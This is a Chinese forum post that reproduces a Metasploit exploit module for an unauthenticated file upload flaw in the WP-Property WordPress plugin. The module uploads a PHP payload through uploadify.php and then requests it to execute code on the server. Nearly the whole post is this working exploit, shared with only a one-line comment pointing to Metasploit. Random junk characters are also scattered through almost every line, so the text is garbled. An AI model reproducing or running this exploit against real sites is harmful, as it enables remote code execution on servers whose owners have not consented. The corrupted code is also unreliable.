WordPress WP-Property PHP 文件上传漏洞, j. }9 ^9 v/ U9 C" x5 D8 B# Y
" p4 V& |! D; Y7 |4 G8 c3 }4 i' g ## # This file is part of the Metasploit Framework and may be subject to
2 W% Y6 S" A; p- x7 j. N- X* T& ~+ R5 \, E
# redistribution and commercial restrictions. Please see the Metasploit7 _: u1 u7 j8 W% J8 `: D6 x' T9 _+ _
( q& E+ o; X: E8 w
# Framework web site for more information on licensing and terms of use.; D! V1 p+ H/ C+ ?7 K
/ f! @3 {! e0 g" y/ N A
# http://metasploit.com/framework/ ##% d, Y5 D4 }0 S
5 ?) q8 g& k2 `; G
, `& U% G% _2 z5 J/ d. p, M6 s3 f# r2 ~2 f- p
8 B- P4 j& L5 U5 h: H
) e9 _9 \. F5 y# K* Frequire 'msf/core'' g: `4 h" R! \8 Z
require 'msf/core/exploit/php_exe'
+ N: j& b+ ^% X. r0 Z1 Y6 Q& ~, J, e& C' G3 H" B$ G, t' i
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
! Y8 ~6 U$ e, q'Description' => %q{$ z5 M" O! m" O2 c2 V
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>5 `, M. I a2 n7 G
[6 e- N, D+ ?. T
'Sammy FORGIT', # initial discovery
$ m& N+ ]4 L8 P: Y8 `! x5 a# k'James Fitts <fitts.james[at]gmail.com>' # metasploit module" F( n# k/ a" `9 d8 Z% I4 O
],5 ~( x$ b$ c, m2 \9 B
'License' => MSF_LICENSE,2 Z6 L& e9 ?! S8 _+ R
'References' =>
d1 T9 a/ S4 z7 x[1 d) O7 Q2 c6 t. l
[ 'OSVDB', '82656' ],, K8 f; U/ ]9 R) Y! s3 I* F
[ 'BID', '53787' ],
6 P G. o. Y# p0 w: |[ 'EDB', '18987'],/ R6 g3 I* j% ?8 O& m
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]) P, q- F& S+ {/ b6 [. \; a: g
],
4 N- V; O; ?- j8 y$ x/ M) l! x'Payload' =>
) q6 q! O# I" L# D{! m, u3 g7 L n, }2 t# K, v9 [; ~
'BadChars' => "\x00",
( x! z- y, Y. A2 E* j- ~- l},2 o1 E3 ]; c3 N7 j: O
'Platform' => 'php',) L( _5 w( d( c" e K8 J
'Arch' => ARCH_PHP,1 }) r4 O1 @( V6 _$ ]( |8 O
'Targets' =>
' q6 P* F+ X1 `' O$ p2 j: A[" O( K, o; ~4 I2 X- [
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
. n* y: _4 k* ]5 N- g/ o- k, L[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
5 Q+ `0 U( [( o" I1 o0 h],8 S/ W) t: E5 P8 o9 t
'DefaultTarget' => 0,
3 ~5 e. k9 j1 _'DisclosureDate' => 'Mar 26 2012'))
0 U' p3 K/ i u
( g9 ~9 v$ q! s2 j6 ^register_options(! X2 R& ^* w( Y7 ~
[
0 v4 E7 `) {$ R- DOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
: ?, x# d1 ~- c: q! J0 s], self.class)7 S) [: w7 E7 @5 o+ z
end' Y# K' _5 h; H$ l) E, @' H
% A8 K1 s/ f( F$ `# udef check
- z* E9 g. I; m8 q* p% H% A8 w) b" Curi = target_uri.path/ g+ S D/ V* u. E$ `( V
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
) r: q" S$ O: Y6 F'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
9 a. g4 G5 ]6 ]2 y7 B2 N; o4 M})
: K# b) W9 {' j: }( A- S1 a- E+ q3 K# i3 l% r
if not res or res.code != 200; V0 G& [, c4 @2 I
return Exploit::CheckCode::Unknown
5 M4 ^; l1 j6 Q2 d' Q3 Gend& q$ u1 [5 h& f' c& e2 |
* |* k, w* g4 o% Q
return Exploit::CheckCode::Appears
. A6 a0 o; g) v) r9 xend+ k+ b& X1 o7 J
! A' y/ U6 T/ x0 P7 {
def exploit" d7 s) J' W, |- \. u
uri = target_uri.path
9 {% |9 T" M: O# @uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
% W/ v% [ V" F6 \# S" k/ W4 @! q6 N0 w) X
data = Rex::MIME::Message.new2 a; y3 a: A. a% H, a& Q; |
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
( D( P* x E$ v" ddata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
, ?0 H+ ^# ?1 p' epost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
! c' \6 k( Q' J0 ~' w Y4 A" R7 f" l" w( f$ \) ? v t' G- x6 ^
print_status("#{peer} - Uploading payload #{@payload_name}")* G1 s2 O+ t, l+ j0 k# W8 c* c. _" e
res = send_request_cgi({
6 @" G! {* G4 D2 m/ [* u1 B/ t: ^'method' => 'POST',
1 N, j' s# ]; z* c'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
" D/ n& V0 m' {5 l! [. G' P'ctype' => "multipart/form-data; boundary=#{data.bound}",! L; P1 l7 u4 S5 A! ^
'data' => post_data
6 ?) v( o0 y" H})( n0 I+ e% g9 t Z
3 [# `) i# H5 r$ o6 y/ { z( J7 Q' ]
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
9 B: N% J/ S- G4 lfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")7 I; J+ ]4 L4 p4 \: F9 S0 Y$ i9 {
end
% v; A( _! j! F/ ^; E$ m8 U9 l8 d4 ?& V8 X g8 d% _
upload_uri = res.body/ z& w5 y+ u" U# s* `$ m J1 t) i) E
, p% l) B; z, @2 e. y3 f4 ~
print_status("#{peer} - Executing payload #{@payload_name}")
9 M ^1 B( i! ]res = send_request_raw({
. A# ~, q. L% x8 z'uri' => upload_uri,& b1 d1 y/ O4 X3 t) [. f
'method' => 'GET'0 `9 i2 E* T# `0 m9 b$ [% S# o
})' m6 B) l! n# G- W& C6 A7 n
end4 D; d6 P5 @5 m4 O
end
; d- N6 b5 v: S, M# _4 T' F6 ^ P3 c. B& D I4 o. w% e
不要问我这写的是什么 怎么利用 我是说msf.! _" a7 \8 t- H8 {; a+ A5 q, X. I
+ a3 E% [1 f2 z2 @- X3 p6 A" ~
|
发表于 2013-1-4 19:51:30
收藏
支持
反对